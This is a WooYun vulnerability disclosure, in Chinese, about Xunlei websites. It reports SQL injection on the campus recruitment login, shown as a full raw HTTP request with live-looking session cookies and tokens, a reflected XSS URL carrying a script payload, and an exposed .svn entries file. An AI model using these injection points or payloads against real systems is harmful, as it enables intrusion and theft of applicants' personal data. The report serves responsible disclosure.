乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-03: 细节已通知厂商并且等待厂商处理中 2015-01-04: 厂商已经确认,细节仅向厂商公开 2015-01-14: 细节向核心白帽子及相关领域专家公开 2015-01-24: 细节向普通白帽子公开 2015-02-03: 细节向实习白帽子公开 2015-02-17: 细节向公众公开
听说迅雷是个好公司
在迅雷校招登入处有注入 http://campus.xunlei.com/
GET /login?account=aaa%40test.com&pwd=admin&from=mo&callback=jQuery183006059867197172708_1420216468993&_=1420216825050 HTTP/1.1Host: svr.campus.xunlei.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0Accept: */*Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://campus.xunlei.com/mobile/t/login.htmlCookie: pgv_pvi=8017659823; niuxbbs_8763_saltkey=qmc2M2bV; niuxbbs_8763_lastvisit=1420161936; niuxbbs_8763_sid=iEEb9r; niuxbbs_8763_lastact=1420165616%09home.php%09space; _ga=GA1.2.977311208.1420171555; check_e=AQAB; check_n=ojx%2Fc8S645rVboX1LNLZyFrRze18YlpFCzh4rxTwS2N7yTALd6%2BSIewRa4p26y2TA4OXvOZf29E9k1onzu95E8qWXxfQs0lI5e6Y%2BAs7qw0%2F52Iw%2B8YabQhYxyFALLRdwZZ9R%2F%2FL9W8XXejTPKRhmxZz9JRrwlCFfioGfDjkyzjS%2FFu531puZHdFi7G1gSKxbp7V0L7YL%2B0iSQOrPyeC5c7eivOsLzq%2Fkv9yKtF7PtNK0QWAKfum8HtqhBuI4y7CwuqRebhzl6Z5cZWJg8hsqgEeMHvvIaxUROzROSGMiJzvCt7Ms7DxY4rOPdyCFb1hBvl5L7CCafguOvJ0fovI5w%3D%3D; _x_t_=0; userid=347711301; sessionid=A51904D69B0738C9006FF784C8418EFBB86360247C6D1E251B780CF57EDD272FF8286E401DBB995117EB10B16C724DED58D6F968FF3E2E0191F20B9B9796802D; nickname=Gankme; __utma=166345655.977311208.1420171555.1420210757.1420210757.1; __utmc=166345655; __utmz=166345655.1420210757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); usrname=; active=1; downbyte=0; downfile=0; isspwd=0; isvip=0; jumpkey=D252A52542409BDC1DFEC96D44B57E75DFB344C58A67B67A32A1C64FA39611B287EDEA1BE8274128B88E6EC717DE6079B5E33D9119D255F4ED07D9CCD9F799B50A9EA7BA1C76E294827CF5210BA8053FB352FB8181AE23FFFE87FC35AF6C3094; logintype=1; onlinetime=0; order=165908730; safe=0; score=200; sex=u; upgrade=0; usernewno=xxxxx; usernick=xxx; usertype=0Connection: keep-alive
有多少简历。。。你们懂得>..<买一送一xss
http://player.client.daquan.xunlei.com/player.php?source_id=16245%273&type=movie&source_type=&title=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E&play_link=&flash_play_link=&ts=1355167569
.svn
widget.xunlei.com/js/.svn/entries
测试下注出的数据已经删除!没有做任何保留!过滤 >..< 不要太相信Js判断了
危害等级:中
漏洞Rank:10
确认时间:2015-01-04 09:52
多谢反馈!
暂无